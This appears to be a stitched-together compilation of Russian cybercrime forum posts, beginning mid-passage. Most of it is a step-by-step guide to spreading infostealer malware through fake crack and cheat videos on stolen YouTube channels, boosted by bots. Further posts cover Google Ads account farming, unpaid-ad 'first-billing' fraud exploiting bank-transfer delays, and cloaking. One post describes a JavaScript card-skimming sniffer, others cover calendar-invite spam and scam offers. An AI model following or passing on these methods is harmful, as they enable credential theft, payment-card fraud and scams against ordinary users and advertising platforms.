в районе 60$ ЛТ фингеры он так же выдает (РАБОТАЙТЕ ЧЕРЕЗ ГАРАНТА ИЛИ ДЕЛАЙТЕ
ВЕРЕФ НА ФОРУМЕ ПОД ЗВАНИЕМ L**Z ) ну вы поняли ЭТО НЕ РЕКЛАМА можете
использовать что то свое но данный софт считается лучшим на рынке
Ах да ПРОКСИ я беру здесь https://proxy6.net/ 100 шт на месяц это вполне
достаточно для работы по цене выйдет где то 130$, страна так же влияет и очень
сильно причем, лучше всего себя отрабатывает Германия советую к ней и
присмотреться, хочу ответит на вопрос ПОЧЕМУ СТРАНА ВЛИЯЕТ ? По собственному
опыту скажу ХЗ вот честно я брал прокси США, Англии, и еще каких то парочку
стран но SEO с них практически не поднималось, возможно так только у меня
было, может быть у вас будет по другому но Германия отрабатывает себе отлично
и SEO всегда 100 практически
Что же собственно делаем дальше нам нужен дедик с такими конфигурациями 16
CPU 32 RAM у официальных продавцом такой стоит около 150$-200$ но если
постараться то можно найти и за 30$-50$ но гарантий что он проживет нужный вам
срок нет никаких, хорошо если продавец замену сделает или бэкнет
Такие мощности нам нужны для того что бы он мог тянуть 100 потоков в софте
YouTube365, обычный ПК просто не вытянят так как не хватит оперативы ну или же
у вас мощный ПК то можно и на основу (НЕ СОВЕТУЮ) вообще любой софт из теневой
отрасли не советую ставить на основу
Дальше нам нужны КУКИ НУЛЕВКИ каналы где 2-10 сабов ими мы будем имитировать собственно просмотры, продавцов я не могу порекомендовать так как все они У*бки продают дешево и в 20 рук причем говорят это в открытую, по этому как бы это странно сейчас не прозвучало я вам советую заказывать КРУТ вашего видео на первых порах где вам с полной уверенностью выведут ваше видео в топ стоит такая услуга недорого от 150-800р но минус такого способа в том что не все крутят качественно, SEO может упасть через 2 часа по этому сразу говорите что нужно не только поднять до 100 но и в ТОП 1 теги вывести, вот это будет считаться качественным крутом после желательно еще накрутить сторонним сервисом 1000 просмотров для вида и для закрепления в общем топе . Но после того как вы сделает первые 2-4к инсталлов себе у вас уже будет достаточно каналов и кук которые будут жить месяц если не больше и можно будет уже самому себе крутить
Что мы имеем по ИТОГУ:
1)Готовые видео
2)Каналы для залива ( ЛОГИ ) от 50 сабов и 1000 просмотров
2)Прокси для работы (на этом все дальше можно просто заказывать крут)
|
3)Дедик 16x32
4)Софт YouTube365
5)Прокси для крута
6)Фингеры
7)Куки Нули от 1000 шт
Теперь поговорим касательно настроек в софте, указываем в нем пути до кук,
проксей, фингеров и ваших залитых на канал ссылок
Касательно того как должна выглядеть ваши ССЫЛКА с ЮТУБА это очень важно
Вот так вот будет выглядеть ссылка для УМНОГО ПОИСКА и способ крута
Она должна быть полной не сокращенной, так же в конце после запятой мы
добавляем ВРЕМЯ в секундах, столько будет находиться бот на вашем ВИДЕО
Ссылок можем указывать сколько угодно, боты пройдутся по всем
Еще есть способ крутить по конкретно заданному ТЕГУ ваше видео, тут ссылка
будет уже выглядеть немного по другому
Например тег valorant skin changer я ввожу этот тег в поиске Ютуба, после я
захожу в адресную строку и забираю там ссылку после ставим запетую указываем
ID вашего видео после также ставим запетую и время , выглядит она вот так
Но тут есть небольшой момент берите ссылку только тогда когда вы находите это
видео в поиске, иначе просто прокрутите все в пустоту и софт ничего не найдет
Так же не забывайте что в ютубе есть фильтр, можно ставить как за час,
сегодня, неделю в любом случае где то да найдете
Можно как по одному так и по всем тегам пройтись
Тут я показываю какие настройки выставляю конкретно Я
Еще хочу вам рассказать по поводу вот этих вкладок:
Как вы видите здесь можно ставить по разному эти функция позволяет софту
искать ваше видео в зависимости того когда оно было залито
Собственно когда только заливаем указываем "За последний час" а когда подняли
и хотим удержать ставим " Сегодня"
Когда у вас залито очень много ВИДЕО и вы хотите поддерживать на них SEO так
же если они на канале держаться уже больше недели, то убираем умный поиск
И крутим по тегам
С вероятностью 100% с первого раза не получиться все запустить идеально и вы
будете ловить ошибки
В этом случае стоит смотреть правильно ли вы указали путь : прокси, куки,
фингеры, линки в любом случае он должен крутить
По времени крутим пока он сам не стопнеться, но если вы крутите одно видео и
постоянно у вас пишем ВИДЕО НЕ НАЙДЕНО стоит поменять подход поиска
А дальше либо оно стреляет и попадает в реки, и вы отображаетесь в топе, либо
нихуя и нужно заливать заново на другой канал
Но по своему опыту скажу SEO может стрельнуть до 100 как сразу сходу причем с
10-20 просмотрами на хороших каналах обычно так и если вы льете какую та
уникальную тему, где вообще нет конкуренции, в любом случае если вы крутите и
видите что уже 450-500 просмотров и SEO все никак не поднялось можно забивать
на это видео на этом канале
Так же есть бот ТГ который проверяет ваше SEO советую к использованию
полностью бесплатный @CheckSEOBot очень полезный инструмент
ТОП НИЩИХ НО ЛОГОПРИНОСЯЩИХ ТЕМ :
GTA5
VALORANT
FORTNITE
RUST
GENSHIN
ОЧЕНЬ ТРУДНО ПОПАСТЬ В ТОП, ЕСТЬ ОЩУЩЕНИЕ ЧТО У ЮТУБА ТРИГЕР КАКОЙ ТО:
FLSTUDIO
FILMORA
BANDICAM
ADOBE PHOTOSHOP
Теперь хочу с вами поговорить по поводу ФО и куда заливать БИЛД
https://www.mediafire.com/ (лучше RAR полностью запароленный иначе могут удалить)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
mega.io
Так же не стоит напрямую указывать ссылку в описание под видео используйте
прокладку, иначе 2-3 раза пожалуются и ее заблокируют
https://telegra.ph/ плюс ее в том что вы можете менять статью редактировать
в будущем, не заходя на канал это очень удобно
По поводу проксей для крута, когда вы купите 100 проксей важно в текстовике
сделать из них 1000 а то и больше копируете вставляете все просто
Так софт не будет стопиться!
Если делаете уникальные видео то вполне хватит 2-3 минут больше не стоит
Статья может и получилась немного сыроватой но вроде важные моменты я описал
исходя из своего опыта, тема давно не новая и ее можно найти на все известном
нам форуме
В любом случае это моя вторая статья которую я пишу в своей жизни всем спасибо за прочтения и удачного пролива!
Здравствуйте, я fallencastle. Занимаю траффиком на протяжении 5-ти лет. Хочу помочь новым людям в этой сфере, в своем начинании. Я умею брать траффик отовсюду(бесплатный, платный траффик). Отвечу на любые ваши вопросы пишите в личные сообщение.
За последние 3 года я перебрал все возможные вертикали, начиная от товарки, заканчивая крипто фишами и БА. Сегмент инсталлов отличается частичной легкостью заливов и прибылью.
Если говорить о заливах, вы можете маневрировать с гуглом. Не можете пробить бренд запросы по типу "TradingView", "TeamViewer" и прочее - Не беда. Вы всегда можете поднять паблик офферы из разряда эмуляторов, архиваторов, видео и фото редакторов, которые отлично проливаются по широким ключам. Для новичков это вообще клад. Вы лишаетесь банов за Using brand Keyword, в разы тяжелее получить "Обход системы" по причине фишинга, клоакинга и тд. Да, конечно конверт и качество логов у вас может быть не настолько хорош как при пробиве первого варианта, но тем не менее, при должной отработке в минусе остаться достаточно трудно.
Второй пункт, это естественно прибыль. О ней мы поговорим чуть дальше, но сразу скажу, что по соотношению к легкости проливов, она в десятки раз выше своих "конкурентов". Товарка, нутра и гембла стоять рядом не будут. За последнее конечно отдельные особи могут начать хейтить, но я говорю про работу соло траффера без команд.
Первое, с чего вы должны начать, и это фундамент, решить для себя с какого типа аккаунтов Вы будете проливаться. Я выделяю 2 основы:
Здесь всё сугубо зависит от оффера. Первый залив я советую ставить всегда за свои. Вы должны понимать, что на предоплатных акках гугл будет брать меньше цену за клик и вы получите более чистый результат от которого сможете оттолкнуться. Недавний пример:
При тестах за свои, не ставьте сразу десятки аккаунтов в надежде запустить хоть какой то. Сделайте это аккуратно и желательно заходя через прогрев. Грейте под гео саморега. Проблема с которой вы столкнетесь если будете с ноги стараться запустить даже относительно белый оффер - Бан за бизнес практику. Прилетит он вам автоматически за то, что гео Аккаунта не соответствует гео Пролива (особенно если заводите под Юсу или Канаду). Касается это только Саморегов, так как они очень "трепетные". Такова особенность гугла по борьбе с фишами и не честными реклами.
Сразу ограничивайте макс ценой за клик, либо используйте manual cpc. Двигайтесь от статуса ключей, и от того на какой позиции вы показываетесь. Иногда это нужно делать через Диагностику объявлений, особенно на статусе "Мы не знаем почему не показываетесь". Не пускайте цену в плавь, иначе результат будет как на первобилах.
Если вас устраивает количество инсталов и качество мата, аккуратно начинайте пушить бюджеты. Система смотрит на % повышения и частотность. Описывать я это не буду, так как система имеет конкретные значения и выносить в паблик не интересно. Однако держите это в голове и приходите путем тестов. Вдруг решите забить и начать пушить по Х2 и выше, готовьтесь к фризу и вызову модера на проверку пеймента, а там и фулл РК.
Естественно, я не могу не вспомнить про корректировку ставок по Девайсам. Если акк прогрет достаточно нормально, мобилки и планшеты сразу идут по -100%, если слабенько, то по чуть чуть играюсь чтобы систему не тригерить. Можно конечно сразу ставить устройства, но есть большой шанс на нулевом аккаунте упасть на фриз из-за этого.
И запомните главное, любое резкое изменение РК , это автоматический сброс всей оптимизации и вывод на проверку ручного модератора. Имеено это многим не дает лить дистанцию и прилетает бан через 3-4 дня после начала пролива. С этим как раз сталкиваются арбитраны, которые пытаются лить логи с кучей общих бюджетов, стараются замыливать ключи, менять настройки с разницами в пару минут и заниматься не проливом, а игрой в прятки, "вдруг гугл не заметит". Здесь вы конечно и анпейды, и ПП, и бизнес, и обход будете получать.
Залив делался только на 1 оффер (палить не буду, так как он уже заведен на
новом акке) и проливался с 26-го августа по 4-е октября. Общая сумма спенда
3500$+- и +20% НДС. 16 000 кликов и CTR 25% с ценой клика 0.22$ именно то,
почему лили за свои. Бюджет пушился постепенно, отливался 90% ЮСА, 10% Канада.
Аккаунт перед заливом был разбанен за Бизнес, при чем не на этапе прогрева, а сразу с целевым оффером. Основная причина блокировки была - заходил без прогрева, сразу под ЮСУ
Количество Логов в панели 2000+. Результат хороший, но есть куда стремится
больше. Самих скачиваний 4000-4500+.
Не смотря на то, что аккаунт был заблочен 4-го октября, доход с него капает сверху уже более месяца. Связано это с долгой отработкой БА. Суммарно 80 000+$ прибыли и ROI 2000+%. В этом и есть огромный плюс инсталов. Делаешь пролив, и получаешь ближайшие пару месяцев выплаты по отработкам.
Источник: https://t.me/+MBRFnz6VDJtiMzQy
Автор adm_ten
Привет всем! Может кто подскажет хороший сервис для клоакинга? В инете много разных, а какой лучше не знаю, мне для ФБ нужно. Но будет неплохо, если кто подскажешь и для Adwords, Спасибо!
Интересует тема добычи логов под fb/gads. Со стиллерами +- тема понятна,
непонятно какие площадки лучше всего выбрать для пролива. Простые темы, аля
"Читы для * ИГРА *" на ютуб явно не подходят, да и устарела уже давно.
Заранее благодарен за любую инфу. Возможна коллаба с взаимообменом опытом, с
меня автоматизация (пишу на чистом C# / Zennoposter в идеале), с вас инф куда
лучше всего двигаться в этом направлении...
Всем доброго времени форумчане, сегодня я вам расскажу как получать каждый
день от 100 - 250 логов с ютуба
Тема не нова и давно есть на другом всеми известном школофоруме, но тут вроде
как нет и я постараюсь полностью передать свой опыт пролива с данного
источника и так же поделюсь некоторыми фишками в конце этой статьи в общем
поехали, просьба сильно не закидывайте палками за орфографию
Для работы нам понадобиться:
1) Стиллер (на который мы будем лить)
2) Криптованный билд
3) Ютуб каналы ( от 10 в день)
4) Дедик 16x32
5) Софт для крута просмотров по тегам
_6) _Куки 1000 шт (они же нулевки, простыми словами это каналы где 1-2
подписчика ими вы будете имитировать просмотры на ютубе )
В общем такой вот набор джентльмена у нас получился
Начну с 3 пункта сразу, так с первым и вторым и так все понятно
3) Ютуб мы берем с логов и только с ЛОГОВ , но не в коем случае не стоит их
самостоятельно регать вручную иначе логов вам просто не видать новореги не
стреляют учтите это раз и навсегда, решает очень многое год канала 19 год и
ниже, но так же и количество подписчиков называют еще их сабами от 50 и выше,
так же активность канала но не всегда самый активный канал это минус для нас
так как хозяин просто удалит наши видосы и мы ничего не выжмем с этого канала.
Просто запомните для себя ( 19 год и ниже + 50 сабов и выше =
почти идеал но не точно
)
Теперь хочу вам рассказать по поводу залива так как эта вещь тонкая, все
потому что если вы неправильно настроите систему то вас просто не пустит в
ютуб мастерскую или же вообще заблокирует доступ и тем самым вы заруините лог,
что бы этого не случилось настраиваем по железа кх и первым 4 цифрам IP можно
страны, так же отключайте уведомления в ютубе это очень важно что бы кх не
спалил вероятность что вы зальете свой видос 90% и да может быть такой что вы
настроите идеально все но все ровно не пустит такое бывает и тут совет просто
скипать дабы не убивать свои прокси, c этим пунктом я думаю все понятно
Небольшое отступления все таки важно вам рассказать как правильно делать
видео для YouTube :
В основном те кто заливает ютуб все воруют друг у друга видео и мало кто
делает уники, со второго варианта вам придет намного больше логов с первого
тоже но ожидайте там соседей но если вы отрабатываете приват линки то вам они
не страшны, но для того что бы понять как видео попадает в ТОП ПОИСКА будем
использовать первый вариант
Итак нам надо такое вот расширения для гугла vidIQ что оно дает - оно
позволяет нам видеть находиться ли видео в ТОПЕ , позволяет анализировать
конкуренцию в поиске, ну и конечно же теги, без тегов ваше видео все ровно что
машина без двигателя
И вообще это тот инструмент без которого на YouTube делать не чего , по сути
это ваш лучший друг в этом источнике он позволяет нам видеть SEO
Всегда стремитесь что бы SEO на вашем видео было 100 из 100 но 80 тоже неплохо
если 50 то ваше видео не стрельнуло запомните это и ютуб его не продвигает
Как по мне тут есть 3 причины: 1)вы плохо сделали описание, мало тегов
2)Плохой канал 3)Слишком высокая конкуренция
Сейчас я покажу пример идеального видео и разберу его по полочкам:
Я использовал запрос как photoshop crack в поиске, по оценке это очень
популярный запрос среди пользователей так как 78 балов и с низкой конкуренции
это можно увидеть справа
Но по своему опыту скажу в YouTube этот запрос задрочен до дыр, и мало у кого
получается вывести свое видео в топ, и так я перехожу на второе видео и вижу
такую картину
Теги по которым находят это видео в поиске, как мы видем они все в топе и их
место, но это не удивительно ведь SEO 100
На этом этапе мы просто копируем все как там, скачиваем видео, описание, все
теги такие же берем, превью и так далее
Запомните одну простую вещь на старте у вас всегда SEO будет 50, оно будет
подниматься когда вы будете крутить просмотры по тегам ваша цель это 100 с
этим думаю понятно
Советую начать с таких тематик как игры с них легче всего получить 200-500
логов в сутки но не надейтесь что там будет жир сами понимаете почему
В след части я разберу все остальное
Есть кто тоже хочет заняться арбитражем трафика? Я вот планирую, и думаю вдвоем-втроем будет проще учиться. Если есть такие же новички, то отпишите в приватку пожалуйста. Может сделаем общий чат.
Spoiler: 500
UPD:
- Переписан JS код: не трогает dom и не вешает на поля события, сбрасывает
активность при открытой(открытии) консоли браузера.
- Добавлен менеджер снифов для удобного хранения (пишется в крон задача).
Чекает на активность сниф и прокладку, ищет на шопе по ключевой строке раз в X
минут как крон будет указан.
- Изменена прокладка, если не дает file_get_contents заюзать то шлет curl
- Чекер бинов всех приходящих карт
- На экспорте чекается экспа карт, карты приводятся в один формат ( месяц 7 -
07, год 2022 - 22 итд).
- Удаление дублей карт: если в шопе постоянные покупатели платят одной
картой, но меняется инфа адреса то удаляется все старое и сохраняется только
новая карта.
- Пофикшена одна sqli и lfi на php старых версий которая была в теории
возможна после авторизации в админке
- Удалена каптча и удлиннена сессия
Собирает карты без отправки ajax или websocket запроса. Чистый js и никакого
jquery итп.
Сам определяет где цвв, где карта, а где экспа.
Схема работы кода:
- Вы ставите js код в js файл или на саму страницу
- Идут логи которые дополняются если инфа на нескольких страницах
**Описание:
ОБУЧЕНИЕ CПЕЦИАЛИСТОВ НА КУРСЕ КОНТЕКСТНОЙ РЕКЛАМЫ В АКАДЕМИИ IMT – ЭТО:**
Практикующий специалист с собственной студией
Проверка домашних заданий, улучшающих Ваш сайт
Выжимка информации, необходимой для получения основных навыков рекламы AdWords
и Яндекс.Директ
Отфильтрованная и систематизированная информация
Работа с практиком, прошедшим этапы проб и ошибок
Через 8 недель вы сможете создавать целевые рекламные объявления с
максимальной рентабельностью
Что вы получите, пройдя курс по обучению контекстной рекламе Google AdWords
Пройдя курс Контекстная реклама, вы научитесь создавать
эффективные рекламные кампании на поиске, в контекстно-медийной сети и
рекламной сети Яндекса
Перестанете сливать бюджет и выведете рекламу на рентабельный уровень
Будете получать больше конверсионного трафика без увеличения бюджетов на
контекстную рекламу
Курс основан на опыте практикующего специалиста, который создает продающие
рекламные объявления с 2010 года
ПРОГРАММА КУРСА «КОНТЕКСТНАЯ РЕКЛАМА GOOGLE ADWORDS»
Обучение контекстной рекламе - курс для профессионалов, для тех, кто знаком с
основами работы в Google AdWords, Яндекс.Директ. На занятиях вместе с
преподавателем вы выстроите рекламную стратегию для продвижения конкретно
вашего бизнеса, исходя из его целей и бюджетов. Все полученные знания в
обязательном порядке закрепите на практических и домашних заданиях, выполнение
которых обязательно. Обучение на курсах по контекстной рекламе позволит
правильно распределять бюджет, получать больше конверсий, не увеличивая
расходов на рекламу. Вы научитесь использовать инструменты автоматизации,
создадите свой «чек-лист» для оптимизации РК и выведения ее на рентабельный
уровень.
1 модуль
Введение в КР
Базовая теория по КР
Сервисы по настройке РК
Виды рекламных кампаний
Основные определения в PPC
Понятие таргетинга
Структура РК в Гугл Адвордс
2 модуль
Практическое занятие по созданию РК
Составление правильных рекламных объявлений
Маркетинговые технологии написания рекламных объявлений
Автоматизация написания заголовков
Специфика подбора семантического ядра для КР
Разные типы соответствия ключевых слов
Правильное использование минус-слов
3 модуль
Практический разбор рекламных кампаний
Проверка настроек таргетинга
Корректировка структуры аккаунта
Оптимизация ключевых слов
Корректировка рекламных объявлений
4 модуль
Создание РК в КМС (контекстно-медийная сеть)
Выбор маркетинговых целей
Работа с таргетингом по аудиториям
Работа с заинтересованной аудиторией покупателей
Подбор релевантных мест размещения
Формирование узкоспециализированных аудиторий
Исключение нерелевантных площадок
Работа по продвижению мобильных приложений
5 модуль
Практическое занятие
Разработка различных аудиторий для контекстно-медийной сети
Разработка и запуск реальной рекламной кампании
6 модуль
Работа с Google Analytics
Теоретические основы работы
Практическое внедрение аналитики в свой проект
Изучение метрик интерфейса
7 модуль
Рекламные кампании Gmail/YouTube/телефонные звонки
Теоретические основы работы
Создание РК
8 модуль
Оптимизация рекламных кампаний
Аудит и составление рекомендаций по улучшению рекламной кампании
9 модуль
Ремаркетинг
Теоретическая основа ремаркетинга
Создание аудиторий с помощью AdWords
Создание аудиторий с помощью Analytics
10 модуль
Технические аспекты AdWords
AdExchange, RTB, SSP, DSP
QS (показатель качества)
Аукцион на поиске
Создание в AdWords торговых компаний и объявлений
11 модуль
Рекламные кампании в FB & Adwords
Таргетированная реклама
Настройка таргетированной рекламы
12 модуль
Портрет ЦА в FB
Написание продающего контента
Технические требования ФБ
13 модуль
Создание аудиторий в ФБ
Оптимизация рекламных кампаний в ФБ
14 модуль
Оптимизация сайтов для КР
Маркетинговая пирамида (пирамида распределения ресурсов)
Структура посадочных страниц
A/B тестирование посадочных страниц
15 модуль
Оптимизация РК
Чек-лист по ежедневной оптимизации РК
Чек-лист по месячной оптимизации РК
Чек-лист вопросов для найма соискателей на должность специалиста по КР
16 модуль
Настройка Google Shopping
Обзор и настройка Google Merchant
Настройка и оптимизация Google Shopping
Скрипты Google Ads
Panda сервис для Google Shopping
NegativeKeywords Tool
17 модуль
Сертификация Google Adwords
Освещение основных вопросов по экзамену основы Google.Adwords
Освещение основных вопросов по экзамену мобильная реклама Adwords
Источник: https://www.imt.academy/kurs-kontekstnaya-reklama
Ссылка на файлы:
You must have at least 10 reaction(s) to view the content.
Внутри вас научат отливать бесплатные 50$ и 350$ которые гугл дает новым зарубежным аккаунтам. Мы будем абузить 50$ и 350$ бонуса, которые потом сможем совершенно бесплатно потратить на рекламу. Рабочих связок нам не дают, только сам способ.
Ролик могу условно поделить на 3 части: информация по работе с аккаунтами
google, платежный метод #1 (карта), платежный метод #2 (банковский аккаунт).
Все это в 30 минутах видео, на практике с реальными аккаунтами и без воды. Для
себя я узнал много нового, вам тоже советую чекнуть, потому что может
пригодиться для других темок. Во многих схемах абуза мы работаем с
генерируемыми картами, но саму матчасть не обьяснили нигде. А про регистрацию
американского банковского аккаунта вообще молчу, нигде не видел актуальной
инфы по саморегам БА в 21ом году.
Продавался за 350$
Курс Фарминг аккаунтов Google Ads (2021) [Василий Нашиба]
Часть #1 - Теория
Что такое фарминг и виды фармленных аккаунтов
Фарминг под разные ГЕО
Подготовка компьютера к работе с многими аккаунтами
Лучшие прокси для фарминга, где брать и как использовать
Настройка антидетект браузеров
Программы для эмуляции разных устройств
Почты на которые можно зарегистрировать рекламный аккаунт
Фильтры которые нужно обойти для успешной работы и сервисы для автоматизации
Часть #2 - Подготовка перед регистрацией
Правильный прогрев браузера
Подготовка вводных данных аккаунта
Трастовые ссылки для регистрации
Подготовка эмуляция трастовых устройств для регистрации рекламного кабинета
Часть #3 - Регистрация и фарминг
Авторская технология фарминга
Создание и наполнение MCC (Му Client Center)
Поднятия трастовости и сертифиция рекламодателя
Подготовка и запуск первых рекламных кампаний
Часть #4 - Чек-листы
Выбор и подготовка антидетект браузера
Выбор и подготовка трастовых почт для регистрации
Список 100 000 трастовых площадок для набива кукисов
Список платформ для интеграции с аккаунтом
Тайминги работы с профилем (что когда делать)
Прохождение сертификации рекламодателя
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/zF9Y6)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
Всме привет, нужна помощь в установке стилера на ленд. Уже 2 день не могу установить его, то дефендер палит, то хром не дает, то билд не стучит(
Добрый день. Ищу партнёрскую программу на скам оффер такого плана:
Суть оффера в том, что жертва выигрывает 3060$, но что бы получить этот
выигрыш, ей необходимо оплатить комиссию.
На данном форуме ничего подобного не нашёл. Хотелось бы найти несколько таких ПП, что бы можно было их менять на случай шейва (это когда недобросовестный оффер ворует в теневую часть депозитов и не отоброжает их в ЛК). Поэтому буду очень признателен, если подскажете, где искать (может есть специальные форумы для таких чёрных партнёрок)
Всем привет! Такой вопрос:
Сделал аккаунты со спендом в 300 евро, процедура стандартная (кто льет
-знает). Настал момент прогрева и тут посыпались фризы. Тактика прогрева
такова, что настраиваю умную РК на товар с крупного шопа (амазон). Затем
выбираю ГЕО конкретного лога, по которому будет крутиться реклама(например вся
Германия). Добавляю темы, которые рекомендует сам гугл (вместо ключей), ставлю
бюджет, НО НИЖЕ предложенного гуглом и погнали.
Отсюда вопрос,в каком из пунктов возможна ошибка?
Текст объявлений копирую с описания товара в шопе (не ввожу вручную).
Слив полного лога обучения со всеми лекциями от ********(800-1200$) за февраль-апрель 2020года, думаю оно не сильно поменялся за последнее время. Сам я считаю, что очень много воды в обучении, как по мне должно быть побольше подробностей.
Hidden content for authorized users.
](https://anonfiles.com/pfb05dCeod/OpenCard_rar)
anonfiles.com
автор @YoungHustler
Как спамеры льют с Календаря на казино и займы
В конце 2016 года пользователям календарей от почтовых сервисов начали
приходить приглашения на разные мероприятия. Однако через Календари iOS и
Google юзеров приглашали не посетить мероприятие, а получить займ или
зарегистрироваться на сайте БК/онлайн-казино.
Spoiler: Скрин
Google и Apple пытались бороться с проблемой, но до сих пор значительных успехов так и не добились. В большинстве случаев пользователи не знают, как отключить уведомления, а если даже и следуют советам на официальных форумах, зачастую это не помогает.
Spoiler: Скрин
В 2019 году на телефоны пользователей обрушилась новая волна спама. В основном завлекают всякими акциями и льют на гемблинг или финансовые офферы (редко на товарку). При этом, даже если пользователь отказывается от мероприятия, уведомления все равно продолжают приходить. Как рассылаются приглашения? Пока спам не носит массовый характер, а уязвимость календарей открыта для тех, кто хочет добыть бесплатный трафик. Как отправлять приглашения на Календарь? Все очень просто — все пользователи Gmail могут отправлять приглашения всем остальным пользователям сервиса. Нужно только в списке гостей мероприятия указать адреса пользователей.
**Процесс пошагово
1. **Открываем Google Календарь. Создаем мероприятие — для этого существует
специальная кнопка в верхнем левом углу, либо можно дважды щелкнуть по нужной
дате в календаре и появится новое мероприятие.
Spoiler: Скрин
2. Заполняем все поля мероприятия. Указываем время, дату, заголовок (естественно завлекающий). В описании вводим максимально емкий призыв к действию и ссылку, которая, кстати, будет активной в приложении адресатов. Добавляем гостей — вводим email-адреса из своей базы. Сохраняем.
Spoiler: Скрин
3. После проверки правильности заполненной информации, можно смело нажимать на кнопку уведомить гостей. Все они получат не только письмо на почту, что не является нашей основной целью, но и уведомление от Календаря на своем телефоне.
Spoiler: Скрин
В iOS аналогичный порядок действий, которое описывает и сам Apple на официальной странице:
Spoiler: Скрин
Есть несколько моментов, которые играют на руку спамерам. Так, сторонние
приложения календарей, например, S Planner от Samsung, могут автоматически
синхронизироваться с Google Календарем (зависит от настроек) и, как следствие,
получать приглашения прямиком от Gmail.
Что еще более важно, приглашения можно рассылать адресам, которых нет в вашем
списке контактов. Более того, антиспам в почте, который фильтрует подобные
письма, по умолчанию не работает в Календаре, так как последний спокойно
добавляет спам в мероприятия и, соответственно, выдает об этом уведомление.
Приходят даже сообщения от предприимчивых китайских товарищей:
Spoiler: Скрин
От них не отстают наши арбитражники, льющие на гемблинг. Они придумывают такие предложения, от которых трудно отказаться:
Spoiler: Скрин
Говорили сложно лить на финансы? Вот, любители данной вертикали завлекают пользователей смартфонов интригующими уведомлениями. Как тут не удержаться и не кликнуть, чтобы узнать, кто же вам одобрил 30 000 рублей займа, если вы даже не подавали заявку:
Spoiler: Скрин
Разумеется, CTR таких приглашений в Календаре остается низким, так как многие пользователи сразу понимают, что это спам. А что если проявить креатив? Например, написать, что идет выбор самой лучшей игры месяца и можно проголосовать за свой вариант, загрузив ее на свой телефон.
Мошенничество в Календаре
В лазейке Google есть и темные стороны. Ей пользуются не только арбитражники,
но и мошенники. Например, они могут рассылать сообщения о вознаграждении,
которое на самом деле является попыткой выманить данные карты (куда-то же надо
отправлять «вознаграждение»). Также через спам на устройство жертвы могут
доставить и вирус.
Spoiler: Скрин
Что делать, если вы не хотите лить с Календаря и вы по ту сторону барьера? Как избавиться от спама в Календаре?
Spoiler: Скрин
В iOS действия по отключению спама схожие:
Источник: partnerkin.com
Ищу человека кто обладает поисковым , баннерным или каким либо похожим траффиком , имею все для длительного конверта вашего трафика в инсталлы , в том числе официальный ленд , ev Certificate , официально зарегистрированную контору и тд , прошу обращаться в лс
Хочу попробовать пролить траф с Фейсбука, сфера есть, суть вопроса - аккаунты
самореги примерно сколько прогревать? две недели хватит? какие есть подводные
камни? Есть ли более менее адекватный шоп с Логами ?
Кому не сложно, заранее благодарен!
Жаба - bankart001@thesecure.biz
Ссылка-
https://www.sendspace.com/file/1mqkih
Проверяем оставляем отзывы
Первобилинг (ПБ, первобил) — по сути это способ получить трафик бесплатно.
В основном выражение связывают с Фейсбуком, именно в этой соцсети
существует пост.оплата открученной рекламы. Первый бил — это
сумма на которую фейсбук дает нам открутить наперед, не снимая за
это деньги с вашей карточки.
Антик — ( антидетект бразузеры ) которые обеспечивают
анонимность при арбитраже трафика, гарантируют полную
конфиденциальность, производят подмену отпечатков браузера и
позволяют работать сразу с несколькими аккаунтами в одном
профиле.
Фарм — это общее понятие, означающее создание качественных
аккаунтов социальных сетей. Аккаунт во время фарма
зарабатывают траст (доверие) от соцсети.
После покупки аккаунта и вноса его в ваш антик, зайдите на аккаунт и
поделайте пару дейстивий, погуляйте на сайтах, посидите на почте и тд. не
летите сразу запускать кампании, тем более если вы сменили антик на
отличающийся от нашего (Окто). Так как для гугла вы сменили аппарат.
Если вы купили аккаунт со спендом или разбан со спендом то
прогрев самого адс не нужно делать, он уже готов.
После дофарма (чем дольше тем лучше), и учтите что даже просто отлежка
это фарм, можно иди в адс и запускать вашу кампанию. Во время дофарма
можно заходить в адс но не запускать кампании.
Первобилить
Кто не знает - это способ не оплачивать рекламу, благодаря кредиту гугл
адс. В интернете есть много статтей об этом.
Работать за свой бюджет
Можно покупать аккаунты без платежки но больше шанс получить бан, в
особености в один момент по подтверждению личности рекламодателя.
Поэтому можно покупать разбаны а самое лучше разбан с верификацией
рекламодателя, немного работать с нашей платежкой и потом перевязать
на свою.
Для теста связки
Открутили - если хороший профит, перевязали на свою платегу и льете за
бюджет.
Как платежный метод на наших аккаунтах мы используем реальные
банковские аккаунты, эти банки европейские, и сам формат IBAN
предусматривает международные переводы, и учитывая это и то, что
европейские банки не имеют высокой скорости переводов (банковский перевод
может идти до 3-5 дней), а в выходные дни они вообще не идут.
А в том что когда гугл отправляет счет на оплату рекламы, то в аналогии с
кредитной картой он не может моментально получить отклик от платежной
системы успешная ли оплата, или есть баланс на счету, и поэтому когда вы
достигли порога биллинга и должны перестать показывать рекламу, вы крутите
ее дальше гораздо больше биллинга, и если вы первобилите то вместо 10 евро
на данный момент можете открутить 100 евро с одного адс.
У вас будет два пути:
На платежке будет баланс и счет будет оплачен и вы будете дальше
отливать.
На платежке не будет баланса и вас заблокируют до момента покрытия
задолженности.
Значит в идеале чтобы вы достигли максимум биллинга в четверг-
пятница, таким образом вы сможете от 3 дней дополнительно
перекручивать бюджет (банковский перевод может идти до 3-5 дней),
а в выходные дни они вообще не идут.
Это достаточно инсайдерская информация, которая позволяет вместо 100
открутить 1000 евро, и она точно не для бесплатной публикации поэтому
скажем лишь лаконично - создавайте несколько рекламных кабинетов.
В большинсве случаев некоторые клиенты сразу же после покупки лезут менять
платежку, не советую так делать. Дофарм и отлежка, после чего только привязка
резервной платежки.
Меняйте платежку после дофарма, и открута не большого количества
средств. Если готовы работать с подачей апелиций для вывода с бана можно
после получения бана из-за неоплаты.
Начинаете с бюджета 5-10$, через каждые 12-24 часа поднимаете его от 25 до 35 %. Альтернативой может быть дублирование кампаний. (до 5 кампаний)
Фриз - это так называемый теневой бан вашего кабинета когда не приходит
оповещение о бане но и открут рекламы не начался. Ваш аккаунт или
обьявление пошло на доп проверку модератором Советую поставить клоаку на
вайт если льете через клоаку. Если товарка просто подождать. Фриз в среднем
длится 3-7 дней. На данный момент способов вывода с фриза не много. Один с
известных это вериф рекламодателя.
В данной инструкции будем рассматривать только адаптивные объявления.
